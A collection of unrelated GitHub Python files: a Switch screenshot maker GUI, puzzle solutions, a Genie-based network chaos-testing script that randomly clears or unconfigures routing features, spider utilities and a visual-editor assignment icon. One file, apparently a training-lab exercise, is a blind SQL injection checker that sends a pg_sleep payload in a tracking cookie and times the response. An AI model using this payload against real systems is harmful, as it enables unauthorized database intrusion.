False\n\t\tself._directionrequested = False\n\n\tdef fromRightToLeft(self):\n\t\tif self._directionrequested:\n\t\t\treturn\n\t\tself._directionrequested = True\n\t\tself._lefttoright.value = False\n\t\tself._righttoleft.value = True\n\t\tself._directionrequested = False\n\n\tdef saveButton(self):\n\t\tglobal settings_json\n\t\ttyp = \"\"\n\t\tif not self._mangacheckbox.value and not self._comiccheckbox.value:\n\t\t\ttyp = \"image\"\n\t\telif self._mangacheckbox.value:\n\t\t\ttyp = \"manga\"\n\t\telse:\n\t\t\ttyp = \"comics\"\n\t\tdirection = \"\"\n\t\tif not self._righttoleft.value:\n\t\t\tdirection = \"ltr\"\n\t\telse:\n\t\t\tdirection = \"rtl\"\n\t\ttry:\n\t\t\ta = bytes.fromhex(self._hmackey.value)\n\t\t\tif(len(a) != 0x20 or sha256(a).hexdigest() != \"e9735dae330300b8bb4b5892c8178f5d57daa32d7b5ef5d15f14491800ce4750\"):\n\t\t\t\traise\n\t\texcept:\n\t\t\tself.alert(\"Invalid HMAC key!\", \"Error!\")\n\t\t\treturn\n\t\ttry:\n\t\t\ta = bytes.fromhex(self._customgameid.value)\n\t\t\tif(len(a) != 16) and self._customgameid.value != \"\":\n\t\t\t\traise ValueError\n\t\t\tif(self._customgameid.value == \"\"):\n\t\t\t\traise\n\t\texcept ValueError:\n\t\t\tself.alert(\"Invalid custom game ID!\", \"Error!\")\n\t\t\treturn\n\t\texcept:\n\t\t\tself._customgameid.value = \"57B4628D2267231D57E0FC1078C0596D\"\n\t\tif self._outputfolder.value == \"\":\n\t\t\tself._outputfolder.value = \".\"\n\t\tsettings_json = {\"outputfolder\": self._outputfolder.value, \"hmackey\": self._hmackey.value, \"customgameid\": self._customgameid.value, \"type\": typ, \"direction\": direction}\n\t\tjson.dump(settings_json, open(appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir+\"/settings.json\", \"w\"))\n\nclass FirstRun(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tBaseWidget.__init__(self, \"First Run Popup\")\n\t\tself._firstrunlabel = ControlLabel(\"Hello! It looks like this is your first time\\nrunning the app. Please go to the settings\\nand fill the encryption key before using\\nthe tool. 
Then, simply drag and drop your\\nfiles in the centre of the app and press\\n\\\"Go!\\\"\")\n\t\tself.formset = [(\"_firstrunlabel\"), (\" \"), (\" \")]\n\nclass NSScreenshotMakerGUI(BaseWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tglobal games_json\n\t\tsuper().__init__(\"NSScreenshotMaker\")\n\t\tself._tmpinputfolder = tempfile.mkdtemp()\n\t\tself._settingsbutton = ControlButton(\"⚙️\")\n\t\tself._settingsbutton.value = self.openSettings\n\t\tself._runbutton = ControlButton(\"Go!\")\n\t\tself._runbutton.value = self.go\n\t\tself._combo = ControlCombo(helptext=\"The game the Switch will think the screenshot is from\")\n\t\tself.gameslist = games_json\n\t\tfor k in self.gameslist:\n\t\t\tself._combo.add_item(k, self.gameslist[k])\n\t\tself._combo.add_item(\"Custom\", \"Custom\")\n\t\tself._combolabel = ControlLabel(\"Game ID\", helptext=\"The game the Switch will think the screenshot is from\")\n\t\tself._imagelist = ControlFilesTree()\n\t\tself._imagelist._form.setDragEnabled(True)\n\t\tself._imagelist._form.setAcceptDrops(True)\n\t\tself._imagelist._form.setDropIndicatorShown(True)\n\t\tself._imagelist._form.dropEvent = self.dropEvent\n\t\tmodel = QFileSystemModel(parent=None)\n\t\tmodel.setReadOnly(False)\n\t\tself._imagelist._form.setModel(model)\n\t\tmodel.setRootPath(QtCore.QDir.currentPath())\n\t\tself._imagelist._form.setRootIndex(model.setRootPath(self._tmpinputfolder))\n\t\tself._imagelist._form.setIconSize(QtCore.QSize(32, 32))\n\t\tself.formset=[(\"_combolabel\", \"_combo\", \"_settingsbutton\"), \"_imagelist\" , \"_runbutton\"]\n\t\tself._firstrunpanel = ControlDockWidget()\n\t\tself._firstrunpanel.hide()\n\t\tself._firstrunwin = FirstRun()\n\t\tif not os.path.isfile(appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir+\"/settings.json\"):\n\t\t\tself._firstrunwin.parent = self\n\t\t\tself._firstrunpanel.value = self._firstrunwin\n\t\t\tself._firstrunpanel.show()\n\t\t\tself._firstrunwin.show()\n\t\tself._settingspanel = ControlDockWidget()\n\t\tself._settingspanel.hide()\n\t\tself._settingswin = SettingsWindow()\n\n\tdef dropEvent(self, event):\n\t\tif event.mimeData().hasUrls:\n\t\t\tevent.setDropAction(QtCore.Qt.CopyAction)\n\t\t\tevent.accept()\n\t\t\t# to get a list of files:\n\t\t\tdrop_list = []\n\t\t\tfor url in event.mimeData().urls():\n\t\t\t\tdrop_list.append(str(url.toLocalFile()))\n\t\t\t# handle the list here\n\t\t\tfor f in drop_list:\n\t\t\t\ttry:\n\t\t\t\t\tif not f.endswith(\".cbr\") and not f.endswith(\".cbz\") and not f.endswith(\".zip\") and not f.endswith(\".rar\"):\n\t\t\t\t\t\tImage.open(f)\n\t\t\t\t\tshutil.copy(f, self._tmpinputfolder)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\telse:\n\t\t\tevent.ignore()\n\t\n\tdef closeEvent(self, event):\n\t\tshutil.rmtree(self._tmpinputfolder)\n\n\tdef openSettings(self):\n\t\tself._firstrunwin.close()\n\t\tself._firstrunpanel.hide()\n\t\tself._settingswin.close()\n\t\tself._settingswin.parent = self\n\t\tself._settingspanel.value = self._settingswin\n\t\tself._settingspanel.show()\n\t\tself._settingswin.show()\n\n\tdef go(self):\n\t\tglobal settings_json\n\t\tif len(os.listdir(self._tmpinputfolder)) == 0:\n\t\t\treturn\n\t\tprevFileName = \"\"\n\t\ttotalElements = 0\n\t\tstate = 0\n\t\tif settings_json[\"type\"] == \"manga\":\n\t\t\tstate = 1\n\t\tif settings_json[\"type\"] == \"comics\":\n\t\t\tstate = 2\n\t\tfor fileName in os.listdir(self._tmpinputfolder):\n\t\t\tprint(\"Processing file \" + fileName)\n\t\t\ttotalElements += 1\n\t\t\tif fileName.endswith(\".zip\") or 
fileName.endswith(\".cbz\"):\n\t\t\t\tzf = zipfile.ZipFile(self._tmpinputfolder+\"/\"+fileName)\n\t\t\t\tfor f in zf.infolist():\n\t\t\t\t\twith open(self._tmpinputfolder+\"/\"+f.filename, \"wb\") as fp:\n\t\t\t\t\t\tfp.write(zf.read(f))\n\t\t\telif fileName.endswith(\".rar\") or fileName.endswith(\".cbr\"):\n\t\t\t\trf = rarfile.RarFile(self._tmpinputfolder+\"/\"+fileName)\n\t\t\t\tfor f in rf.infolist():\n\t\t\t\t\twith open(self._tmpinputfolder+\"/\"+f.filename, \"wb\") as fp:\n\t\t\t\t\t\tfp.write(rf.read(f))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tif state == 0:\n\t\t\t\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"])\n\t\t\t\t\telif prevFileName != \"\":\n\t\t\t\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"], state, self._tmpinputfolder+\"/\"+prevFileName)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"], state, self._tmpinputfolder+\"/\"+prevFileName)\n\t\t\t\t\t\tprevFileName = \"\"\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tprevFileName = fileName\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\tif state != 0 and totalElements % 2 != 0:\n\t\t\tif list(self._combo._items.values())[self._combo.current_index] != \"Custom\":\n\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), list(self._combo._items.values())[self._combo.current_index], settings_json[\"outputfolder\"])\n\t\t\telse:\n\t\t\t\tprocessFile(self._tmpinputfolder + \"/\" + fileName, bytes.fromhex(settings_json[\"hmackey\"]), settings_json[\"customgameid\"], settings_json[\"outputfolder\"])\n\n\nif __name__ == '__main__':\n\tNSScreenshotMakerPath = appdirs.AppDirs(\"NSScreenshotMaker\", \"\").user_data_dir\n\tif not os.path.isdir(NSScreenshotMakerPath):\n\t\tos.mkdir(NSScreenshotMakerPath)\n\tif os.path.isfile(NSScreenshotMakerPath+\"/settings.json\"):\n\t\tsettings_json = json.load(open(NSScreenshotMakerPath+\"/settings.json\", \"r\"))\n\tfrom pyforms import start_app\n\tstart_app(NSScreenshotMakerGUI)\n#くコ:彡\n","repo_name":"cheuble/NSScreenshotMaker","sub_path":"NSScreenshotMaker.py","file_name":"NSScreenshotMaker.py","file_ext":"py","file_size_in_byte":16031,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"17462235511","text":"import math\n\n\ndef solution(i):\n \"\"\" A function which takes an integer between 0 and 10000 as input,\n uses it as the index number passed into a single string of all ordered prime numbers,\n and returns a 5-digit ID number of the next 5 digits in the string starting at the specified index. 
\"\"\"\n\n # function for checking the total concatenated character length of all values in a list given the addition of a new value\n length_list = []\n\n def get_total_length(x):\n length_list.append(len(str(x)))\n return sum(length_list)\n\n # creates a list of all prime numbers in order, up to a total concatenated character length of 10005\n # (prompt: # minions up to 10000 = starting index up to 10000, whose 5 digit ID would extend to index 10004)\n list_of_primes = [n for n in range(2, 100000) if all(n % m != 0 for m in range(2, int(math.sqrt(n)) + 1))\n if get_total_length(n) < 10005]\n\n # creates a single string of concatenated prime numbers\n string_of_primes = \"\".join(map(str, list_of_primes))\n\n # selects and return 5 digit ID based on the input\n minion_id = string_of_primes[i:i+5]\n return minion_id\n\n\nprint(solution(3))","repo_name":"anterra/google-foobar","sub_path":"challenge 1.py","file_name":"challenge 1.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37825048524","text":"# solution to hand cycle problem presented by Juan\r\n\r\n# n number of steps, t fingers\r\ndef formula(n, t):\r\n if n < 1: return n # before start of hand ..\r\n n, t = n - 1, t - 1\r\n return (n%t if n%(2*t) < t else t-n%t) + 1\r\n\r\nif __name__ == '__main__':\r\n # test 50 steps with 5 fingers\r\n for n in range(50):\r\n print(formula(n, 5))\r\n","repo_name":"UCSC-Interview-Prep/Coding-Problems","sub_path":"fingercycle.py","file_name":"fingercycle.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5921484366","text":"import requests\nimport sys\nimport urllib3\nimport urllib\nimport re\nfrom bs4 import BeautifulSoup\n\n# Disable SSL/TLS warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Configure proxy settings if needed\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n\ndef bilind_sql_check(url):\n sql_payload = \"'||pg_sleep(10)--\"\n sqli_encode = urllib.parse.quote(sql_payload)\n cookies = {'TrackingId':'a8QPFx9KdlWLvgQr'+ sqli_encode,'session':'tiA0TOYaCzSFu3hoyLwDrQVyuqsAYXMG'}\n r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)\n if int(r.elapsed.total_seconds())>10:\n print(\"(+) sql injection var\")\n else:\n print(\"(+) sql injection yok\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"[-] Usage: %s \" % sys.argv[0])\n print(\"[-] For Example: %s http://www.random.com\" % sys.argv[0])\n sys.exit(-1)\n \n url = sys.argv[1]\n print(\"(+) check if cookie sql\")\n bilind_sql_check(url)\n","repo_name":"efegorkemumit/sql_injection","sub_path":"lab13/lab13.py","file_name":"lab13.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70926831788","text":"import os.path\nimport sys\nimport traceback\n\nimport you_get\nimport openpyxl\nimport requests\nimport time\nfrom settings import picture_download_interval, record_type, record_source, record_keyword, record_author, record_title, \\\n record_introduction, record_tags, record_caption, record_url_article, record_url_pic, record_url_local, log_path, \\\n excel_path, download_video_check, requests_timeout\n\nrequests.DEFAULT_RETRIES = 5 # 增加重试连接次数\n\ndef log(message:str):\n with open(log_path, 'a') as f:\n f.write(time.ctime())\n 
f.write(message + \"\\r\\n\")\n # logging.debug(traceback.format_exc())\n\ndef getResModel(type:str, source:str, keyword:str, author:str,\n title:str, introduction:str, tags:list, caption:str,\n url_article:str, url_pic:str, url_local:str):\n res = {\n record_type: type,\n record_source: source,\n record_keyword: keyword,\n record_author: author,\n record_title: title,\n record_introduction: introduction,\n record_tags: tags,\n record_caption: caption,\n record_url_article: url_article,\n record_url_pic: url_pic,\n record_url_local: url_local,\n }\n return res\n\ndef download_pic(url:str, path:str):\n try:\n r = requests.get(url, timeout=requests_timeout)\n open(path, 'wb').write(r.content) # 将内容写入图片\n except:\n log(traceback.format_exc())\n time.sleep(picture_download_interval) # 停一下,别过分了\n\ndef download_video(video_url: str, path:str, name:str):\n if not download_video_check:\n return\n # 使用sys.argv内置方法,可以在代码中输入CMD命令\n sys.argv = ['you-get', '-o', path, '-O', name, video_url, \"--debug\"]\n # 通过you-get模块,实现下载\n you_get.main()\n\n# excel\nclass Excel:\n # 全部关键词\n keywordDict = {\n # \"设备\":[],\n # \"软件\":[],\n # \"形式\":[],\n # \"类型\":[]\n }\n # 防止重复导入网页记录\n allHttps = dict()\n # 统计tag分布\n allTags = dict()\n\n def __init__(self, path:str):\n self.path = path\n self.excel = openpyxl.load_workbook(path)\n sheetnames = self.excel.sheetnames\n\n self.table = self.excel[sheetnames[0]]\n self.__initHttps()\n\n self.tagTable = self.excel[sheetnames[2]]\n self.__initTags()\n\n self.keywordTable = self.excel[sheetnames[1]]\n self.__initKeyWords()\n\n # 获取实际最大行行号\n def __getMaxRow(self, sheet):\n i = sheet.max_row\n print(\"伪最大行数:\" + str(i))\n real_max_row = 0\n while i > 0:\n # print(i)\n if i % 500 == 0:\n print(\"正在检查有效行:\" + str(i))\n if sheet[i][0].value is None:\n i = i-1\n else:\n real_max_row = i\n break\n print(\"真最大行数:\" + str(real_max_row))\n print(\"*\"*50)\n return real_max_row\n\n # 读取链接记录\n def __initHttps(self):\n self.nrows = self.__getMaxRow(self.table) # 获得行数\n # self.nrows = 1\n self.ncolumns = self.table.max_column # 获得列数\n for i in range(1, self.nrows+1):\n self.__recordHttps(self.table.cell(i,9).value)\n\n # 读取tag记录\n def __initTags(self):\n tagRows = self.__getMaxRow(self.tagTable)\n for i in range(1, tagRows + 1):\n self.allTags[self.tagTable.cell(i, 1).value] = self.tagTable.cell(i, 2).value\n\n # 读取关键词\n def __initKeyWords(self):\n rows = self.__getMaxRow(self.keywordTable)\n column = self.keywordTable.max_column\n for i in range(1, rows+1):\n temp = []\n for j in range(2, column+1):\n try:\n temp.append(self.keywordTable.cell(i,j).value.split(\" \"))\n except:\n # log()\n pass\n self.keywordDict[self.keywordTable.cell(i,1).value] = temp\n\n # 查重\n def checkHttpRepeat(self, url:str):\n return url in self.allHttps.keys()\n\n # 统计新增的网页链接\n def __recordHttps(self, url:str):\n if url in self.allHttps.keys():\n self.allHttps[url] += 1\n # return False\n else:\n self.allHttps[url] = 1\n # return True\n\n # 统计新增的tag\n def __recordTags(self, tag:str):\n if tag in self.allTags.keys():\n self.allTags[tag] += 1\n else:\n self.allTags[tag] = 1\n\n # 因为tags为列表\n def appendTagsFromList(self, tags:list):\n for tag in tags:\n self.__recordTags(tag)\n\n # 保存并记录tags\n def __saveTags(self):\n i = 1\n for key in self.allTags.keys():\n self.tagTable.cell(i, 1).value = key\n self.tagTable.cell(i, 2).value = self.allTags[key]\n i+=1\n\n def appendRecord(self, resDict:dict):\n aim = [resDict[record_type], resDict[record_source], resDict[record_keyword], resDict[record_author],\n 
resDict[record_title], resDict[record_introduction], \",\".join(resDict[record_tags]),\n resDict[record_caption], resDict[record_url_article],\n resDict[record_url_pic], resDict[record_url_local]]\n column = 1\n self.nrows += 1\n for value in aim:\n self.table.cell(self.nrows, column).value = value\n column += 1\n\n def saveExcel(self):\n self.__saveTags()\n self.excel.save(self.path)\n\nexcel = Excel(excel_path)\n","repo_name":"Maryin-c/KeywordSpider_pictures_videos","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"3089557276","text":"import os\nfrom pyats.datastructures.logic import And, Not, Or\nfrom genie.harness.main import gRun\nimport argparse\n\n# chaos only knows..\nimport random\n\n# how brave are you?\n# comprehensive list of triggers / docs located at\n# https://pubhub.devnetcloud.com/media/pyats-packages/docs/genie/genie_libs/#/triggers\n\nPOSSIBLE_TRIGGERS = [\n 'TriggerClearBgpAll',\n 'TriggerClearIpOspfNeighborVrfAll',\n 'TriggerClearIpRoute',\n 'TriggerUnconfigConfigEvpnVni',\n 'TriggerUnconfigConfigVlanInterface',\n 'TriggerUnconfigConfigVlanVnsegment',\n # 'TriggerClearIpMroute'\n\n]\n\nRANDOM_TRIGGER = random.choice(POSSIBLE_TRIGGERS)\n\n\n\"\"\" KNOWN_ISSUES \"\"\"\n\n\n\"\"\"\n'TriggerUnconfigConfigNvOverlayEvpn'\n\n\n'TriggerUnconfigConfigBgp'\n\n2019-01-16T22:55:58: %AETEST-ERROR: Failed reason: Failed to unconfigure feature\n2019-01-16T22:55:58: %AETEST-ERROR:\n2019-01-16T22:55:58: %AETEST-ERROR: Exception:\n2019-01-16T22:55:58: %AETEST-ERROR: Traceback (most recent call last):\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/triggers/unconfigconfig/unconfigconfig.py\", line 100, in unconfigure\n2019-01-16T22:55:58: %AETEST-ERROR: self.mapping.unconfigure(device=uut, abstract=abstract, steps=steps)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1071, in unconfigure\n2019-01-16T22:55:58: %AETEST-ERROR: return self.configure(unconfig=True, *args, **kwargs)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1156, in configure\n2019-01-16T22:55:58: %AETEST-ERROR: unconfig, name, **kwarg)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1163, in _configure\n2019-01-16T22:55:58: %AETEST-ERROR: co = abstracted_ops(device=device, **kwargs)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/conf/bgp/bgp.py\", line 1288, in __init__\n2019-01-16T22:55:58: %AETEST-ERROR: self.bgp_id = int(bgp_id)\n2019-01-16T22:55:58: %AETEST-ERROR: TypeError: int() argument must be a string, a bytes-like object or a number, not 'list'\n\n\"\"\"\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--trigger',\n dest='trigger',\n default=None)\n # parser.add_argument('--inventory',\n # dest='inventory',\n # default='inventory/test.yaml')\n args, unknown = parser.parse_known_args()\n\n test_path = os.path.dirname(os.path.abspath(__file__))\n # print(args)\n\n # mapping_datafile is mandatory\n # trigger_uids limit which test to execute\n\n if args.trigger:\n trigger = 
args.trigger\n else:\n trigger = RANDOM_TRIGGER\n\n\n gRun(mapping_datafile=os.path.join(test_path, 'mapping_datafile.yaml'),\n pts_datafile='pts_datafile.yaml',\n pts_features=['ospf', 'bgp'],\n trigger_uids=Or(trigger))\n","repo_name":"CiscoTestAutomation/solutions_examples","sub_path":"netchaos/network_chaos_monkey.py","file_name":"network_chaos_monkey.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"} +{"seq_id":"70618574187","text":"from PIL import Image\nimport ast\nimport comn\nimport icon\nimport iconlayout\nimport iconsites\nimport nameicons\nimport listicons\nimport opicons\nimport entryicon\nimport parenicon\nimport cursors\n\nassignDragImage = comn.asciiToImage((\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"...ooo\",\n \"..o%%%\",\n \"55%%%.\",\n \"%%%%..\",\n \"55%%%.\",\n \"..o%%%\",\n \"...ooo\",\n \"......\",\n \"......\",\n \"......\",\n \"......\"))\n\ninpSeqImage = comn.asciiToImage((\n \"ooo\",\n \"ooo\",\n \"ooo\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"oo.\",\n \"o..\",\n \"...\",\n \"o..\",\n \"oo.\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"ooo\",\n \"ooo\",\n \"ooo\"))\n\nclass AssignIcon(icon.Icon):\n def __init__(self, numTargets=1, window=None, location=None):\n icon.Icon.__init__(self, window)\n opWidth, opHeight = icon.getTextSize('=')\n opWidth += 2*icon.TEXT_MARGIN + 1\n opHeight += 2*icon.TEXT_MARGIN + 1\n siteY = inpSeqImage.height // 2\n self.opSize = (opWidth, opHeight)\n tgtSitesX = assignDragImage.width - 3\n seqSiteX = tgtSitesX + 1\n self.sites.add('seqIn', 'seqIn', seqSiteX, siteY - inpSeqImage.height // 2 + 1)\n self.sites.add('seqOut', 'seqOut', seqSiteX, siteY + inpSeqImage.height//2 - 2)\n self.sites.add('seqInsert', 'seqInsert', 0, siteY)\n self.tgtLists = [iconlayout.ListLayoutMgr(self, 'targets0', tgtSitesX, siteY,\n simpleSpine=True)]\n valueSitesX = tgtSitesX + icon.EMPTY_ARG_WIDTH + opWidth\n self.valueList = iconlayout.ListLayoutMgr(self, 'values', valueSitesX, siteY,\n simpleSpine=True)\n self.dragSiteDrawn = False\n if location is None:\n x = y = 0\n else:\n x, y = location\n width = assignDragImage.width + self.tgtLists[0].width + opWidth - 2 + \\\n self.valueList.width\n self.rect = (x, y, x + width, y + inpSeqImage.height)\n for i in range(1, numTargets):\n self.addTargetGroup(i)\n\n def draw(self, toDragImage=None, location=None, clip=None, style=0):\n needDragSite = toDragImage is not None and self.prevInSeq() is None\n if self.drawList is None or self.dragSiteDrawn and not needDragSite:\n self.drawList = []\n siteY = self.sites.seqInsert.yOffset\n # Left site (seq site bar + 1st target input or drag-insert site\n leftTgtHasSpine = self.tgtLists[0].simpleSpineWillDraw()\n tgtSiteX = self.sites.targets0[0].xOffset\n if leftTgtHasSpine:\n tgtSiteX -= icon.OUTPUT_SITE_DEPTH\n if needDragSite:\n y = siteY - assignDragImage.height // 2\n self.drawList.append(((0, y), assignDragImage))\n elif not leftTgtHasSpine:\n y = siteY - inpSeqImage.height // 2\n self.drawList.append(((tgtSiteX, y), inpSeqImage))\n # Commas, spines and an = for each target group\n txtImg = icon.iconBoxedText('=')\n opWidth, opHeight = txtImg.size\n img = Image.new('RGBA', (opWidth, opHeight), color=(0, 0, 0, 0))\n img.paste(txtImg, (0, 0))\n rInSiteX = opWidth - icon.inSiteImage.width\n rInSiteY = opHeight // 2 - icon.inSiteImage.height // 2\n img.paste(icon.inSiteImage, (rInSiteX, rInSiteY))\n for i, tgtList in enumerate(self.tgtLists):\n 
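# draw this group's comma images, then its simple spine (if one is needed)\n                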
self.drawList += tgtList.drawListCommas(tgtSiteX, siteY)\n spines = tgtList.drawSimpleSpine(tgtSiteX, siteY, drawOutputSite=False)\n if i == 0 and leftTgtHasSpine:\n # If the leftmost target list has a spine, drawing of inpSeqImage\n # was skipped, above, and we draw the sequence sites on the spine\n leftSpineImg = spines[0][1]\n icon.drawSeqSites(leftSpineImg, 0, 0, leftSpineImg.height)\n self.drawList += spines\n tgtSiteX += tgtList.width - 1\n self.drawList.append(((tgtSiteX + icon.OUTPUT_SITE_DEPTH,\n siteY - opHeight // 2), img))\n tgtSiteX += opWidth - 1\n self.drawList += self.valueList.drawListCommas(tgtSiteX, siteY)\n self.drawList += self.valueList.drawSimpleSpine(tgtSiteX, siteY)\n self._drawFromDrawList(toDragImage, location, clip, style)\n self._drawEmptySites(toDragImage, clip, hilightEmptySeries=True)\n self.dragSiteDrawn = needDragSite\n\n def addTargetGroup(self, idx):\n if idx < 0 or idx > len(self.tgtLists):\n raise Exception('Bad index for adding target group to assignment icon')\n # Name will be filled in by renumberTargetGroups, offset by layout\n self.tgtLists.insert(idx, iconlayout.ListLayoutMgr(self, 'targetsX', 0, 0,\n simpleSpine=True))\n self.renumberTargetGroups(descending=True)\n self.window.undo.registerCallback(self.removeTargetGroup, idx)\n self.markLayoutDirty()\n\n def removeTargetGroup(self, idx):\n if idx <= 0 or idx >= len(self.tgtLists):\n raise Exception('Bad index for removing target group from assignment icon')\n seriesName = 'targets%d' % idx\n for site in self.sites.getSeries(seriesName):\n if site.att is not None:\n raise Exception('Removing non-empty target group from assignment icon')\n del self.tgtLists[idx]\n self.sites.removeSeries(\"targets%d\" % idx)\n self.renumberTargetGroups()\n self.window.undo.registerCallback(self.addTargetGroup, idx)\n self.markLayoutDirty()\n\n def renumberTargetGroups(self, descending=False):\n tgtLists = list(enumerate(self.tgtLists))\n if descending:\n tgtLists = reversed(tgtLists)\n for i, tgtList in tgtLists:\n oldName = tgtList.siteSeriesName\n newName = \"targets%d\" % i\n if oldName != newName:\n tgtList.rename(newName)\n getattr(self.sites, newName).order = i\n self.sites.values.order = len(self.tgtLists)\n\n def snapLists(self, forCursor=False):\n # Add snap sites for insertion to those representing actual attachment sites\n siteSnapLists = icon.Icon.snapLists(self, forCursor=forCursor)\n insertSites = []\n for tgtList in self.tgtLists:\n insertSites += tgtList.makeInsertSnapList()\n insertSites += self.valueList.makeInsertSnapList()\n siteSnapLists['insertInput'] = insertSites\n # Snap site for seqOut is too close to snap site for inserting the first target.\n # Nudge the seqOut site down and to the left to make it easier to snap to\n ic, (x, y), siteType = siteSnapLists['seqOut'][0]\n siteSnapLists['seqOut'][0] = (ic, (x-1, y+1), siteType)\n return siteSnapLists\n\n def execute(self):\n # Get the target and value icons\n tgtLists = []\n for tgtList in self.tgtLists:\n tgts = []\n for site in getattr(self.sites, tgtList.siteSeriesName):\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment target(s)\")\n tgts.append(site.att)\n tgtLists.append(tgts)\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # Execute all of the value icons\n executedValues = []\n for value in values:\n executedValues.append(value.execute())\n # Assign the resulting values to the targets\n 
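\n# --- Illustrative aside, not part of the original file; the helper below is hypothetical. ---\n# execute() mirrors plain Python assignment semantics: a single value is assigned\n# as-is, several values are packed into a tuple, and every '=' clause receives the\n# same packed value. The packing rule in isolation:\ndef _pack_values(executed_values):\n    # one value stays scalar (a = 42); several become a tuple (a = 1, 2)\n    if len(executed_values) == 1:\n        return executed_values[0]\n    return tuple(executed_values)\n\nassert _pack_values([42]) == 42\nassert _pack_values([1, 2]) == (1, 2)\n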
if len(values) == 1:\n value = executedValues[0]\n else:\n value = tuple(executedValues)\n for tgts in tgtLists:\n if len(tgts) == 1:\n tgtIcon = tgts[0]\n else:\n tgtIcon = tgts\n self.assignValues(tgtIcon, value)\n\n def createAst(self):\n # Get the target and value icons\n tgtLists = []\n for tgtList in self.tgtLists:\n tgts = []\n for site in getattr(self.sites, tgtList.siteSeriesName):\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment target(s)\")\n tgts.append(site.att)\n tgtLists.append(tgts)\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # Make asts for targets and values, adding tuples if packing/unpacking is\n # specified\n if len(values) == 1:\n valueAst = values[0].createAst()\n else:\n valueAst = ast.Tuple([v.createAst() for v in values], ctx=ast.Load(),\n lineno=self.id, col_offset=0)\n tgtAsts = []\n for tgts in tgtLists:\n perTgtAsts = []\n for tgt in tgts:\n if isinstance(tgt, parenicon.CursorParenIcon):\n perTgtAsts.append(tgt.childAt('argIcon').createAst())\n else:\n perTgtAsts.append(tgt.createAst())\n if len(tgts) == 1:\n tgtAst = perTgtAsts[0]\n else:\n tgtAst = ast.Tuple(perTgtAsts, ctx=ast.Store(), lineno=self.id,\n col_offset=0)\n tgtAsts.append(tgtAst)\n return ast.Assign(tgtAsts, valueAst, lineno=self.id, col_offset=0)\n\n def createSaveText(self, parentBreakLevel=0, contNeeded=True, export=False):\n brkLvl = parentBreakLevel + 1\n text = icon.seriesSaveText(brkLvl, getattr(self.sites,\n self.tgtLists[0].siteSeriesName), contNeeded, export)\n text.add(None, \" = \")\n for tgtList in self.tgtLists[1:]:\n icon.addSeriesSaveText(text, brkLvl,\n getattr(self.sites, tgtList.siteSeriesName), contNeeded, export)\n text.add(None, \" = \")\n icon.addSeriesSaveText(text, brkLvl, self.sites.values, 